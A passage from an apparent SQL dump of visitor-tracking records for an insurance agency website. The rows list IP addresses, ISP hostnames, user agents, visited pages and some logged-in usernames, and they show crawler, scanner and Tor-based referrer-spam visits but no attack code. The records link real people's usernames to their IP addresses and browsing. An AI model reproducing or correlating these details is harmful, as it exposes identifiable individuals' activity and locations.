Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2410,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486216','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2411,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486225','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2413,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486297','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2416,'0b_731099674e4b3accce0f3a6fd6f4e785','1457486303','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2419,'0b_b50c1d272870db2194c4dcb39a70992c','1457486642','107.21.1.8','ec2-107-21-1-8.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)','http://www.empireins.com/','',0,'','','us','','','','','','','0','0',0),(2420,'0b_ba2d4360e2641f092fe953f2301f486d','1457488714','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2423,'0b_731099674e4b3accce0f3a6fd6f4e785','1457490938','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2426,'0b_0b5546495975db99546fb4cdf151f232','1457491179','52.26.97.19','ec2-52-26-97-19.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(2429,'0b_731099674e4b3accce0f3a6fd6f4e785','1457492345','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2431,'0b_731099674e4b3accce0f3a6fd6f4e785','1457493076','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2434,'0b_731099674e4b3accce0f3a6fd6f4e785','1457494719','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2435,'0b_ac6b863529f94608d711f3ea534756f1','1457495314','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2438,'0b_1d1ab15ddb9b275b71dd3eea07941a19','1457496069','66.249.73.187','crawl-66-249-73-187.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2440,'0b_1c774ed550a40340789131174ec30c1f','1457499023','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2441,'0b_16aba963cd446a70a534fb7e45038fb5','1457499536','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2444,'0b_a951e0f966717eb0bbf7c8e621c8d386','1457501381','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(2447,'0b_709f53d1268485acf70c13bc673bcee5','1457501459','51.255.65.4','hydrogen002.ahrefs.com','/about-us/feed/','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2450,'0b_998db419d9cbc89ca74d66afb6053a99','1457504520','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(2452,'0b_9d299aeba3ce1721b72243339cf08128','1457504537','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(2453,'0b_b712bc2fbac29587e87c4fad3cee803d','1457511431','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2455,'0b_325d023c45721a4429418e7d05134472','1457513972','107.21.179.167','ec2-107-21-179-167.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','','',0,'WinXP','Firefox 22','us','','','','','','','0','0',0),(2456,'0b_325d023c45721a4429418e7d05134472','1457513973','107.21.179.167','ec2-107-21-179-167.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','http://www.empireins.com/','',0,'WinXP','Firefox 22','us','','','','','','','0','0',0),(2458,'0b_fce6a2aecd283984d9cc4312c307c31e','1457513995','107.21.179.167','ec2-107-21-179-167.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','','',0,'WinXP','Firefox 17','us','','','','','','','0','0',0),(2461,'0b_fce6a2aecd283984d9cc4312c307c31e','1457513995','107.21.179.167','ec2-107-21-179-167.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','http://www.empireins.com/','',0,'WinXP','Firefox 17','us','','','','','','','0','0',0),(2464,'0b_2bf764fe919a86ea7bcdfdc19e721345','1457514009','107.21.179.167','ec2-107-21-179-167.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','http://www.empireins.com/','',0,'WinXP','Firefox 17','us','1024 x 768','','','','','','0','0',0),(2465,'0b_2bf764fe919a86ea7bcdfdc19e721345','1457514012','107.21.179.167','ec2-107-21-179-167.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','http://www.empireins.com/','',0,'WinXP','Firefox 17','us','1024 x 768','','','','','','0','0',0),(2467,'0b_4d4c9611844c0eefd1ca56481105398c','1457515463','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2468,'0b_767aed375b9385dfd069d6ded5811e8b','1457517097','66.249.73.187','crawl-66-249-73-187.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2471,'0b_bb68ea58807b721f0fa4b72d48ca9a5a','1457519372','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2474,'0b_8c927bfdcebef31ca1ffacc2883d6af4','1457522686','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(2476,'0b_abf6b59fea7831b0ad986c2acba3b539','1457523424','37.187.95.167','37.187.95.167','/carriers/feed/','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2479,'0b_00bf1ee96cb838851384c246f8133198','1457523975','54.152.146.110','ec2-54-152-146-110.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible& Googlebot/2.1& +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','0','0',0),(2482,'0b_120556d8ce61b0e19c3664795ef1d98e','1457523977','54.152.146.110','ec2-54-152-146-110.compute-1.amazonaws.com','/','Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','','',0,'Android 4','Safari 4 Mobile','kr','','','','','','','0','0',0),(2483,'0b_7a9df4f7a84daee7344446792e4885b7','1457525230','183.60.244.46','183.60.244.46','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','','',0,'MacOSX','Chrome 36','','','','','','','','0','0',0),(2485,'0b_483621519721f81047d405fbfd353476','1457525911','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2488,'0b_ffec9e2febdb137bed2a51475f3c5f6b','1457526706','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2489,'0b_8b78c7071daa2fb2477f45f045c04fa1','1457528814','66.249.75.103','crawl-66-249-75-103.googlebot.com','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2491,'0b_8c0c275e6265acc032d3a0269e851db4','1457529652','54.85.143.3','ec2-54-85-143-3.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible& Googlebot/2.1& +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','0','0',0),(2492,'0b_4423bdffeee88860bb24ec0c60a47494','1457529653','54.85.143.3','ec2-54-85-143-3.compute-1.amazonaws.com','/','Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','','',0,'Android 4','Safari 4 Mobile','kr','','','','','','','0','0',0),(2495,'0b_f3476003c5abc347e0609c31c72cd95c','1457531417','66.249.75.96','crawl-66-249-75-96.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2498,'0b_f3476003c5abc347e0609c31c72cd95c','1457531439','66.249.75.96','crawl-66-249-75-96.googlebot.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(2500,'0b_d4f59440d372ba721503faf7731e3062','1457532445','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','https://www.google.com','_notprovided_',1,'Win10 x64','Firefox 44','us','','www.google.com','','','','','0','0',0),(2501,'0b_d4f59440d372ba721503faf7731e3062','1457532447','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','','','','','','','0','0',0),(2503,'0b_917d485affaae05e40d878cb18896d08','1457533104','173.50.165.82','static-173-50-165-82.pghkny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(2506,'0b_917d485affaae05e40d878cb18896d08','1457533107','173.50.165.82','static-173-50-165-82.pghkny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(2507,'0b_d4f59440d372ba721503faf7731e3062','1457533109','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','0',0),(2510,'0b_d4f59440d372ba721503faf7731e3062','1457533138','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/about-us/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2513,'0b_d4f59440d372ba721503faf7731e3062','1457533155','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/carriers/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2516,'0b_d4f59440d372ba721503faf7731e3062','1457533160','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/agent-tools/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2519,'0b_d4f59440d372ba721503faf7731e3062','1457533164','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/licensing-contracting/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2522,'0b_b2dee21dfb565f8602d71298de86ac2e','1457534109','66.87.116.66','66-87-116-66.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2524,'0b_b2dee21dfb565f8602d71298de86ac2e','1457534110','66.87.116.66','66-87-116-66.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2525,'0b_f3bcc8088645fe2e2d3237b96f26e25c','1457534354','109.201.133.100','.','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(2527,'0b_f5b47fac487403989599b1e0d92db071','1457534358','93.174.90.30','2.shulgin.nl.torexit.haema.co.uk','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','gb','','','','','','','2','0',0),(2530,'0b_90b88adf7f600d3b0330c4a5da97b858','1457534376','176.126.252.12','aurora.enn.lu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','lu','','','','','','','2','0',0),(2533,'0b_8523c0be70bc08b6bf5ade5c7449eceb','1457534641','38.122.67.250','38.122.67.250','/','Java/1.8.0_71','','',0,'','','','','','Java','','','','0','0',0),(2534,'0b_1dc85bf43afc9b926f6f3879b17c805c','1457535585','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(2536,'0b_e8075b50bc1fe65bcb6106155298997f','1457535585','5.150.232.52','h-232-52.a348.priv.bahnhof.no','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','no','','','','','','','2','0',0),(2539,'0b_1dc85bf43afc9b926f6f3879b17c805c','1457535587','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(2540,'0b_d0f18cb711e3c565ce6b622f1a8a1003','1457535592','176.10.104.240','tor1e1.privacyfoundation.ch','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','ch','','','','','','','2','0',0),(2543,'0b_488be4ee9a200d284d12a8206f1bd139','1457535883','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2545,'0b_488be4ee9a200d284d12a8206f1bd139','1457535884','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2546,'0b_a1e5ed2476f39fd27a255b785e323409','1457535893','107.152.186.125','107.152.186.125','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(2548,'0b_e5e3cf2a8e330ab3ae4e3fab529e6e16','1457536436','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2549,'0b_e5e3cf2a8e330ab3ae4e3fab529e6e16','1457536440','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2551,'0b_f3bacb40dec7c64351f4c8889677b6a2','1457537024','77.247.181.162','chomsky.torservers.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(2552,'0b_ea44db445ec9907f4bb304fb83149d2d','1457538217','66.87.87.43','66-87-87-43.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2554,'0b_88494bf2cbab74fb228252ee436f4615','1457538356','65.19.167.132','65.19.167.132','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(2557,'0b_76102a46b0a03c81e263b04228e63f5d','1457538367','212.47.227.72','tor-exit.hermes.bendellar.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(2560,'0b_e71127652cf8112cfe868153930ee45c','1457539104','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(2561,'0b_e71127652cf8112cfe868153930ee45c','1457539105','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(2563,'0b_2404210561996d2089b48611e0bca491','1457539307','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2564,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539422','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2567,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539424','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2570,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539427','184.154.139.23','placeholder.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2572,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539432','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2573,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539434','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2576,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539436','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2578,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539438','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2579,'0b_c79f13539f5aed2358bc2482cf340cbd','1457539440','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(2581,'0b_2404210561996d2089b48611e0bca491','1457539910','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2584,'0b_2404210561996d2089b48611e0bca491','1457539914','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2585,'0b_2404210561996d2089b48611e0bca491','1457539916','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2588,'0b_ee3ff1fbb3548484b020f704ed41c6be','1457540438','65.158.205.50','65.158.205.50','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 48','us','','Google','','','','','0','0',0),(2590,'0b_ee3ff1fbb3548484b020f704ed41c6be','1457540450','65.158.205.50','65.158.205.50','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','','','','','','','0','0',0),(2591,'0b_c8393f745c6593c4eee443e7a6bc5a74','1457541840','66.87.116.18','66-87-116-18.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(2594,'0b_581db299e9e0fb1c6c140c3872512c59','1457542154','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(2597,'0b_38aa538be4ffbb57b1ca83f72ae4bd18','1457543541','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 